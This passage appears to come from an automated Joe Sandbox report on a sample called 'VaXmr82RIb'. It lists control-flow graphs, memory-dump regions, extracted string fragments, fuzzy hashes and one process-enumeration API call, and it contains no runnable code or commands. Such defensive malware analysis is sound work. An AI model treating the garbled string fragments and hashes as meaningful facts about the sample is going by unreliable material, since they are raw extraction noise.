                                                      control_flow_graph 2836 89f0040-89f0059 2837 89f0060-89f007e 2836->2837 2840 89f0085-89f016f 2837->2840 2847 89f0537-89f0611 2840->2847 2848 89f0175-89f025b 2840->2848 2847->2837 2861 89f0617-89f06bd 2847->2861 2859 89f0262-89f041c 2848->2859 2859->2848 2886 89f0422-89f0531 2859->2886 2861->2847 2875 89f06c3-89f0843 2861->2875 2875->2837 2900 89f0849-89f08bf call 360ee60 2875->2900 2886->2840 2886->2847 2900->2837 2907 89f08c5-89f0a7b 2900->2907 2907->2840 2920 89f0a81-89f0b42 2907->2920 2920->2837 2927 89f0b48-89f0c18 2920->2927 2927->2848 2934 89f0c1e-89f0ce3 2927->2934 2934->2848 2941 89f0ce9-89f0de4 2934->2941 2941->2848 2948 89f0dea-89f0eea 2941->2948 2948->2837 2955 89f0ef0-89f11d4 2948->2955 2955->2848 2974 89f11da-89f1560 call 360ee60 2955->2974 2974->2859 2999 89f1566-89f164c 2974->2999 2999->2848 3006 89f1652-89f1759 2999->3006 3006->2837 3013 89f175f-89f1986 call 360ee60 3006->3013 3013->2837 3032 89f198c-89f2004 call 360ee60 3013->3032 3032->2837 3075 89f200a-89f22e0 call 360ee60 3032->3075 3075->2837 3094 89f22e6-89f23e6 3075->3094 3094->2859 3101 89f23ec-89f2a00 call 360ee60 * 2 3094->3101 3101->2837 3144 89f2a06-89f2c10 3101->3144 3144->2837 3157 89f2c16-89f2eca call 360ee60 3144->3157 3157->2840 3176 89f2ed0-89f2fda 3157->3176 3176->2848 3183 89f2fe0-89f3289 3176->3183 3183->2848 3202 89f328f-89f3379 call 360ee60 3183->3202 3202->2840 3209 89f337f-89f34f8 3202->3209 3209->2837 3222 89f34fe-89f36ba 3209->3222 3222->2837 3235 89f36c0-89f37b0 3222->3235 3235->2848 3242 89f37b6-89f3ba3 call 360ee60 * 2 3235->3242 3242->2859 3267 89f3ba9-89f3c5c 3242->3267 3267->2848 3274 89f3c62-89f3d58 3267->3274 3274->2837 3281 89f3d5e-89f42fd 3274->3281 3281->2848 3318 89f4303-89f43e1 3281->3318 3318->2859 3325 89f43e7-89f44d6 3318->3325 3325->2837 3332 89f44dc-89f45ae 3325->3332 3332->2859 3339 89f45b4-89f4699 3332->3339 3339->2837 3346 89f469f-89f4782 3339->3346 3346->2859 3353 89f4788-89f4adf 3346->3353 3353->2859 3378 89f4ae5-89f4b40 call 360ee60 3353->3378 3380 89f4b45-89f4d7b 3378->3380 3380->2840 3397 89f4d81-89f4d99 3380->3397 3397->2840 3399 89f4d9f-89f4da4 3397->3399
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: p6c$9/'_$=#$?"1$}+=
                                                      • API String ID: 0-3954522359
                                                      • Opcode ID: 1a7c13a0ad4baebda41d5dfeb7e08abdcb1434bdf729d41416f99eacbd4e021a
                                                      • Instruction ID: af931bfa24de452121e2407134cd920b7d657779a6ff8b589bb9a8e3b1246f45
                                                      • Opcode Fuzzy Hash: 1a7c13a0ad4baebda41d5dfeb7e08abdcb1434bdf729d41416f99eacbd4e021a
                                                      • Instruction Fuzzy Hash: 01A3CBB4E0061C9FCB58DFA8C891A9EBBB2EF84314F2085E9D549A7354DB359E81CF44
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \ Q$(?8q$*$,3$.*$PHjq
                                                      • API String ID: 0-1137169102
                                                      • Opcode ID: 2bc9e5ddcb85739545d2c04defbd1829c31ac9d8f77cc09a5a08c5255b4c5c93
                                                      • Instruction ID: 29ad96aefa331864a90b72f000d3e560295ec502f4d4415ab964f989a61ba54f
                                                      • Opcode Fuzzy Hash: 2bc9e5ddcb85739545d2c04defbd1829c31ac9d8f77cc09a5a08c5255b4c5c93
                                                      • Instruction Fuzzy Hash: D8839376E012288FCB54DF68D88469AB7F2BF88314F1585AED809EB351DB359D46CF80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: n>;$"T/l$6(;U
                                                      • API String ID: 0-2473328630
                                                      • Opcode ID: 4ecdf65f7f15fabe0f5a3f1a7eb5f8a4deba86b469e947c598886944843061dc
                                                      • Instruction ID: 4b5b971a2b293cdcae73bcd142d10c02ee650e369618eabbb72ad9fab48109b7
                                                      • Opcode Fuzzy Hash: 4ecdf65f7f15fabe0f5a3f1a7eb5f8a4deba86b469e947c598886944843061dc
                                                      • Instruction Fuzzy Hash: 0B237376F102288FCB58DF68D89059AF7E3AB88310B15856DE849EB355DB35EC46CBC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $6$"G8T$%Z7Q
                                                      • API String ID: 0-608656841
                                                      • Opcode ID: 7fc0238e280c81bec23a3e2d08808ee71f81bdb13e0765c48a0825dc3ee968b7
                                                      • Instruction ID: dcb6d57d617691ef6e249d75fdb880fc08e1114c005a99bcb465878cabea79f7
                                                      • Opcode Fuzzy Hash: 7fc0238e280c81bec23a3e2d08808ee71f81bdb13e0765c48a0825dc3ee968b7
                                                      • Instruction Fuzzy Hash: 96E24276E102298FDB68DF68C884A99F7F2BB88314F1582A9D90DE7351D7709D85CF80

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 5509 89c4cc8-89c4cd4 5510 89c4cd7-89c4cdf 5509->5510 5511 89c4ce2-89c4d37 5510->5511 5512 89c4d3d-89c4d52 5511->5512 5513 89c502e-89c5054 5511->5513 5512->5513 5514 89c4d58-89c4d7a 5512->5514 5518 89c5056-89c505d call 89c3610 5513->5518 5514->5513 5515 89c4d80-89c4d8f 5514->5515 5515->5510 5517 89c4d95-89c4dbd 5515->5517 5517->5510 5519 89c4dc3-89c4e00 5517->5519 5522 89c5062-89c5068 5518->5522 5519->5513 5521 89c4e06-89c4e19 5519->5521 5521->5513 5523 89c4e1f-89c4e3f 5521->5523 5524 89c507f-89c5085 5522->5524 5525 89c506a-89c5079 call 89c3ec8 5522->5525 5523->5513 5526 89c4e45-89c4e4f 5523->5526 5524->5525 5528 89c5087-89c5093 5524->5528 5525->5524 5526->5511 5529 89c4e55-89c4e6f 5526->5529 5531 89c5096-89c50a8 5528->5531 5529->5511 5532 89c4e75-89c4ec2 5529->5532 5533 89c50aa-89c50f0 5531->5533 5534 89c50f5-89c5119 5531->5534 5532->5513 5537 89c4ec8-89c4eda 5532->5537 5547 89c5185-89c5191 5533->5547 5535 89c58ad-89c58da 5534->5535 5536 89c511f-89c5125 5534->5536 5559 89c58e1-89c590c 5535->5559 5536->5522 5539 89c512b-89c517f 5536->5539 5537->5513 5540 89c4ee0-89c4ef4 5537->5540 5539->5547 5540->5513 5542 89c4efa-89c4f06 5540->5542 5542->5517 5545 89c4f0c-89c4f2d 5542->5545 5545->5517 5546 89c4f33-89c4f98 5545->5546 5546->5513 5549 89c4f9e-89c4fb1 5546->5549 5547->5518 5551 89c5197-89c51a2 5547->5551 5549->5513 5553 89c4fb3-89c4fc8 5549->5553 5554 89c51ec-89c522d 5551->5554 5555 89c51a4-89c51b7 5551->5555 5553->5513 5557 89c4fca-89c4fda 5553->5557 5554->5518 5556 89c5233-89c523c 5554->5556 5555->5522 5558 89c51bd-89c51de 5555->5558 5560 89c524d-89c5281 5556->5560 5561 89c523e 5556->5561 5557->5529 5562 89c4fe0-89c5012 5557->5562 5563 89c51e6 5558->5563 5588 89c5913-89c5928 5559->5588 5567 89c52e0-89c5307 5560->5567 5568 89c5283-89c528f 5560->5568 5564 89c54df-89c54fa 5561->5564 5565 89c5244-89c5247 5561->5565 5562->5511 5566 89c5018-89c501e 5562->5566 5563->5554 5564->5518 5580 89c5500-89c5554 call 89c4b48 5564->5580 5565->5560 5565->5564 5566->5511 5570 89c5024-89c502b 5566->5570 5572 89c530f-89c5328 5567->5572 5573 89c5309 5567->5573 5568->5525 5571 89c5295-89c52da 5568->5571 5571->5567 5572->5525 5577 89c532e-89c5340 5572->5577 5574 89c530b-89c530d 5573->5574 5575 89c5346-89c53e6 5573->5575 5574->5572 5574->5575 5575->5524 5591 89c53ec-89c5403 5575->5591 5577->5575 5580->5518 5589 89c555a-89c55fe call 89c4b48 5580->5589 5596 89c592e-89c593c 5588->5596 5597 89c592a-89c592b 5588->5597 5589->5531 5616 89c5604-89c5650 5589->5616 5594 89c5405-89c544b 5591->5594 5595 89c5451-89c548a 5591->5595 5594->5595 5595->5525 5604 89c5490-89c54be 5595->5604 5599 89c593e-89c594f 5596->5599 5597->5596 5605 89c5954-89c5983 call 89c4180 5599->5605 5604->5522 5611 89c54c4-89c54d9 5604->5611 5614 89c59f9-89c59ff 5605->5614 5615 89c5985-89c598d 5605->5615 5611->5564 5614->5599 5620 89c5a05-89c5a4b 5614->5620 5615->5599 5618 89c598f-89c59ee 5615->5618 5616->5518 5624 89c5656-89c568f 5616->5624 5618->5599 5630 89c59f4 5618->5630 5620->5605 5625 89c5a51-89c5a93 5620->5625 5624->5522 5629 89c5695-89c56cc 5624->5629 5631 89c5a99-89c5a9f 5625->5631 5629->5588 5637 89c56d2-89c573b 5629->5637 5630->5631 5631->5599 5632 89c5aa5-89c5af2 5631->5632 5632->5599 5636 89c5af8-89c5b14 5632->5636 5639 89c57f6-89c5829 5637->5639 5640 89c5741-89c575a 5637->5640 5639->5588 5644 89c582f-89c5883 5639->5644 5640->5518 5641 89c5760-89c57a3 5640->5641 5641->5588 5643 89c57a9-89c57f1 5641->5643 5647 89c5890-89c58aa 5643->5647 5648 89c588c-89c588e 5644->5648 5648->5559 5648->5647
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088439310.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89c0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 1*M$7?$8=4
                                                      • API String ID: 0-575145823
                                                      • Opcode ID: d973710a096a179cf3afed625714e9757c7b755f9efd1a539cedb5a80cbece8e
                                                      • Instruction ID: 737332361994b49913a53b34cd7ee9e06d1445a7a634098fd0852d48c51e6e8a
                                                      • Opcode Fuzzy Hash: d973710a096a179cf3afed625714e9757c7b755f9efd1a539cedb5a80cbece8e
                                                      • Instruction Fuzzy Hash: 4082C476F006398BCB18DEA9C89059EF7E2BB8831071A816DDC19EB355D775AC11CBC1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 5650 80e0990-80e099f 5651 80e09a4-80e152b call 360ee60 5650->5651 5764 80e155c-80e1591 5651->5764 5765 80e152d-80e154e 5651->5765 5769 80e1594-80e159e 5764->5769 5765->5651 5768 80e1554-80e155b 5765->5768 5809 80e15a0 call 80e0980 5769->5809 5810 80e15a0 call 80e0990 5769->5810 5770 80e15a5 5771 80e15a8-80e15e7 5770->5771 5772 80e17fc-80e1887 CreateToolhelp32Snapshot 5771->5772 5773 80e15ed-80e1608 5771->5773 5778 80e1889-80e188f 5772->5778 5779 80e1890-80e18a4 5772->5779 5773->5772 5774 80e160e-80e1658 5773->5774 5783 80e165a-80e1665 5774->5783 5778->5779 5806 80e1668 call 80e18ad 5783->5806 5807 80e1668 call 80e18b8 5783->5807 5784 80e166d-80e166f 5785 80e1675-80e167c 5784->5785 5786 80e17a1-80e17d6 5784->5786 5785->5783 5787 80e167e-80e168d 5785->5787 5786->5772 5791 80e17d8-80e17ec 5786->5791 5787->5769 5788 80e1693-80e16be 5787->5788 5788->5771 5790 80e16c4 5788->5790 5792 80e1732-80e175d 5790->5792 5791->5771 5798 80e17f2-80e17f9 5791->5798 5793 80e16c6-80e16ce 5792->5793 5794 80e1763 5792->5794 5793->5772 5797 80e16d4-80e16f1 5793->5797 5796 80e1769-80e1798 5794->5796 5796->5785 5801 80e179e 5796->5801 5802 80e1712-80e172c 5797->5802 5803 80e16f3-80e170a 5797->5803 5801->5786 5802->5792 5803->5769 5805 80e1710 5803->5805 5805->5796 5806->5784 5807->5784 5809->5770 5810->5770
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 080E187A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: CreateSnapshotToolhelp32
                                                      • String ID: '/3T
                                                      • API String ID: 3332741929-3084761499
                                                      • Opcode ID: 9b90436b5e22cbc83b52d1bc6703663381fcc7290dd4c736eef08de8f19fa3b7
                                                      • Instruction ID: 49b4cac0df56fd68ef05956ee692e4ab533e29fad802856fdd822d10f0dd0d81
                                                      • Opcode Fuzzy Hash: 9b90436b5e22cbc83b52d1bc6703663381fcc7290dd4c736eef08de8f19fa3b7
                                                      • Instruction Fuzzy Hash: 418209B6F006384BCB58DFB8C89166FB7E7AB84750B05456ED84AEB380DE349C058BD5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30085838938.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7b30000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (nq$Hnq$$jq
                                                      • API String ID: 0-1257844683
                                                      • Opcode ID: 78a21e365bd2d5e0af5cffb3c2c7c2845fda9a8effbd96d030b9fc942282f5a1
                                                      • Instruction ID: 19165c49b1e5d8e3e5df3490872f79c9015449fb784cb89981fdd3b68c898d2a
                                                      • Opcode Fuzzy Hash: 78a21e365bd2d5e0af5cffb3c2c7c2845fda9a8effbd96d030b9fc942282f5a1
                                                      • Instruction Fuzzy Hash: 61D104B1B102518FCB18DF68C89466ABBF2EF85300F1985AAC805DF391DB75DC85CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PHjq$`<&;
                                                      • API String ID: 0-3512224124
                                                      • Opcode ID: 3c65ded2a4828540003026aebce184d799e0bd6733af5f5f6f4ff1dd4f784a58
                                                      • Instruction ID: c1781f2cce853bfc4780091b5cb825b7f906a07ea05e5eb42e6d21c267fd855b
                                                      • Opcode Fuzzy Hash: 3c65ded2a4828540003026aebce184d799e0bd6733af5f5f6f4ff1dd4f784a58
                                                      • Instruction Fuzzy Hash: 5AC2A276B001258FC718DF69D89095AFBE3ABC831071A856EE809EB355DB75EC46CBC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30085838938.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7b30000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: >3!${%
                                                      • API String ID: 0-2948576519
                                                      • Opcode ID: cd87663f583d08788467d63e430522e1858c910a33da2f5aceda32b550c6896b
                                                      • Instruction ID: 89181a15361f27bc9c612d888472a3e0200e20cbc9f736bc0a67198021ade841
                                                      • Opcode Fuzzy Hash: cd87663f583d08788467d63e430522e1858c910a33da2f5aceda32b550c6896b
                                                      • Instruction Fuzzy Hash: 00A2CAB5F006384FCB58DF78C89069EB7F7AB88310B1585AED909EB381DA349D458BD4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30085838938.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7b30000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: >3!${%
                                                      • API String ID: 0-2948576519
                                                      • Opcode ID: 2afc29c369666c4fe52c8a7abfaf3afb72e2f330fe9130d454eb2efe76633e56
                                                      • Instruction ID: 703b869bdbf5e2c583828aed302ce19cf5f2041bb38b4c8d0678aa390b4843d8
                                                      • Opcode Fuzzy Hash: 2afc29c369666c4fe52c8a7abfaf3afb72e2f330fe9130d454eb2efe76633e56
                                                      • Instruction Fuzzy Hash: 9982D9B5F006384BCB58DF78C89069EB7E7AB88310B1585AED94DEB380DE349D458BC4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088439310.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89c0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: <E8-
                                                      • API String ID: 0-3215472544
                                                      • Opcode ID: 149ff0beccaf7e0bcd0ee6c25899370ac4eb64b27826d24fa9155edd93e589b6
                                                      • Instruction ID: bec879c9663bca13159a46203ba94c7f88f54aa24a161060f23614aa8a6f3421
                                                      • Opcode Fuzzy Hash: 149ff0beccaf7e0bcd0ee6c25899370ac4eb64b27826d24fa9155edd93e589b6
                                                      • Instruction Fuzzy Hash: D1236376E106298FCB25DF58C980699F7F6BB48310F5586E9D809EB341D734AE86CF80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30085838938.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7b30000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )9+z$;g=i
                                                      • API String ID: 0-900698434
                                                      • Opcode ID: e590018d1d93dd2fdaa7c1ee91bce2b7adc4563ed18493cd08ce9dca24c95e37
                                                      • Instruction ID: fd20cad715139a52dd9ac46a6b814541218c5221244161bed00db1b6a736c690
                                                      • Opcode Fuzzy Hash: e590018d1d93dd2fdaa7c1ee91bce2b7adc4563ed18493cd08ce9dca24c95e37
                                                      • Instruction Fuzzy Hash: 88F1B5B5F002698FC714DFA8C89099ABBB6EF8435071585AAD809EB351DB35EC46CBD0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %Q$G$.+6a
                                                      • API String ID: 0-1834041138
                                                      • Opcode ID: 6c37f342040de4a46e8be3031da90e0cd41446c04edc2f7d61d923f5d065c5ec
                                                      • Instruction ID: fde2b9f6f7a3ca42135ec5f77de178393e42823cde0d556c17a5dcc307245875
                                                      • Opcode Fuzzy Hash: 6c37f342040de4a46e8be3031da90e0cd41446c04edc2f7d61d923f5d065c5ec
                                                      • Instruction Fuzzy Hash: 86B1F96FF20A354B8B98EA7D28D413EA1C7ABE8610319447ED907EF394DE68CC4543C9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hnq$Hnq
                                                      • API String ID: 0-3075287205
                                                      • Opcode ID: 740bef0e942ffccae9d395c70ad293ff2890840b0b86d92f58b5655185b6c739
                                                      • Instruction ID: eb795e325ae8bb15363d865fdd8eccdc13232a508439847cf9a804ca2ef9f38f
                                                      • Opcode Fuzzy Hash: 740bef0e942ffccae9d395c70ad293ff2890840b0b86d92f58b5655185b6c739
                                                      • Instruction Fuzzy Hash: 93B1F376F142218BC70CDE7D889452FFAD6ABD8210B0D8D6EAC5AE7394DA34EC1587C1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -Y+g$:>3O
                                                      • API String ID: 0-2428480409
                                                      • Opcode ID: dea7207ec158947def012e2f6d6542b0388123966cfc80800c301ea05bbd3ee7
                                                      • Instruction ID: 3689774f351963302368f964117139e345ed278ba1b7bc461d183125111b20c2
                                                      • Opcode Fuzzy Hash: dea7207ec158947def012e2f6d6542b0388123966cfc80800c301ea05bbd3ee7
                                                      • Instruction Fuzzy Hash: 33A1EE75B003058FCB18EFA9C9D069DB7B2AF89314B19C17AD906EF356DA74AC46CB40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088439310.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89c0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: <E8-
                                                      • API String ID: 0-3215472544
                                                      • Opcode ID: 51e771e805ef138b83680332d717fef03e9ec68016d7662e0aa7399ed6d7745c
                                                      • Instruction ID: e24bce4ddcadc4785c21f38cbf3a38dc6c925f1f261ddd91c7b0db975eb1fe95
                                                      • Opcode Fuzzy Hash: 51e771e805ef138b83680332d717fef03e9ec68016d7662e0aa7399ed6d7745c
                                                      • Instruction Fuzzy Hash: 41C25F76E106398FCB25DF68C884699B7F6BB48310F5586EAD819E7340D734AE85CF80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PHjq
                                                      • API String ID: 0-751881793
                                                      • Opcode ID: 6d766c3f0a744b709d8f6aa9799004ce17ac09d7eb892de76907426254ce5e5c
                                                      • Instruction ID: f16bf4d453554ce450442e05ca8cdd9e52333cc7913ba4b85615685095deae2e
                                                      • Opcode Fuzzy Hash: 6d766c3f0a744b709d8f6aa9799004ce17ac09d7eb892de76907426254ce5e5c
                                                      • Instruction Fuzzy Hash: 2A82B776F102258FCB18DFA8C88459EBBF2EF8831071A856AD959EB351D735DC46CB80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: '/3T
                                                      • API String ID: 0-3084761499
                                                      • Opcode ID: 6db61c5697fadd6a99f5ecd4aa9586bb1ffc8b7c4b08a23d22892da63447daaa
                                                      • Instruction ID: b82227edffc7cd065e74813e0c123fd9dba43e9dc4780788e7d6bf4dc61d7a40
                                                      • Opcode Fuzzy Hash: 6db61c5697fadd6a99f5ecd4aa9586bb1ffc8b7c4b08a23d22892da63447daaa
                                                      • Instruction Fuzzy Hash: E75219B6F0063C4BCB68DEB8989166FB7E7AB84740705496ED84AFB380DE349C0587D5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RZ
                                                      • API String ID: 0-1855665147
                                                      • Opcode ID: dd1c394d1e6669e3dc8efe8850be9d6fe17cca459d9923ba154b2672cad2ba9f
                                                      • Instruction ID: 6052646f877e74b3ec87762461a469ae8e19e206d189c3b8043b949e573046c4
                                                      • Opcode Fuzzy Hash: dd1c394d1e6669e3dc8efe8850be9d6fe17cca459d9923ba154b2672cad2ba9f
                                                      • Instruction Fuzzy Hash: 0F32D576F102298FCB14DF69C8919AEBBF3AF85210715856EE805EB351DB35AC06CBD0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: =[-=
                                                      • API String ID: 0-1001269455
                                                      • Opcode ID: 1c0a3d246a522740975f142e121f457d280805ecbbed12597d5e138e5402b085
                                                      • Instruction ID: dc6edcf97231a854eeed281ccc4d27e007c0152a9d7adfde426051cde67645cb
                                                      • Opcode Fuzzy Hash: 1c0a3d246a522740975f142e121f457d280805ecbbed12597d5e138e5402b085
                                                      • Instruction Fuzzy Hash: F362D479E102189FCB58DFA4D6946ACBBB2FF85210F6080ADD41AAB354DF356E81CF41
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: =[-=
                                                      • API String ID: 0-1001269455
                                                      • Opcode ID: 6ce8f4899bc71b948221b80384c7a9cbbf75f9b6192f32e0deabff0958a45db6
                                                      • Instruction ID: 399bd1c36d755862d93f020d78df04fd00b8fcbbb0b062f424bb02459650bc5c
                                                      • Opcode Fuzzy Hash: 6ce8f4899bc71b948221b80384c7a9cbbf75f9b6192f32e0deabff0958a45db6
                                                      • Instruction Fuzzy Hash: 2B52C479E102189FCB58DFA4D5946ACBBB2FF85210F6080ADD41AAB354DF356E81CF41
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !=
                                                      • API String ID: 0-3871193270
                                                      • Opcode ID: 1247e0fb0f45b2e2c143279d3831848d497e81857d7692325a3f3cc0e8c9b454
                                                      • Instruction ID: d6f52c42c1a1bbddaf4b21eb5be9717a32795be175b660c9e203d5ade3cc2c56
                                                      • Opcode Fuzzy Hash: 1247e0fb0f45b2e2c143279d3831848d497e81857d7692325a3f3cc0e8c9b454
                                                      • Instruction Fuzzy Hash: 95128F75B002158FCB58DFA9D8D0A6AF7E3AB88310B19C56DE809DB341DB75EC46CB80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -q90
                                                      • API String ID: 0-242358158
                                                      • Opcode ID: 795b58cb0bbf1ddabb191c28aecf82a2a6313f585ac848a53143c4588bbab047
                                                      • Instruction ID: db6e5e79b82392fcfd8202abb8d0a34b26ff780ae0d34239b9dcec58a20b394d
                                                      • Opcode Fuzzy Hash: 795b58cb0bbf1ddabb191c28aecf82a2a6313f585ac848a53143c4588bbab047
                                                      • Instruction Fuzzy Hash: 8E123FB6F106288FC758DFA8D89059EB7F6BB88314725856DD809EB345DB35EC06CB80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: >Z(
                                                      • API String ID: 0-3970202910
                                                      • Opcode ID: a13a243b497bcdc667bcbccfbe9c09d1ed2bfc984a124b7871796ee9a5e1eec7
                                                      • Instruction ID: 9ba598f0018f434adfb2c660c01b0bd0a657c87e356522d4705e028f19b47a27
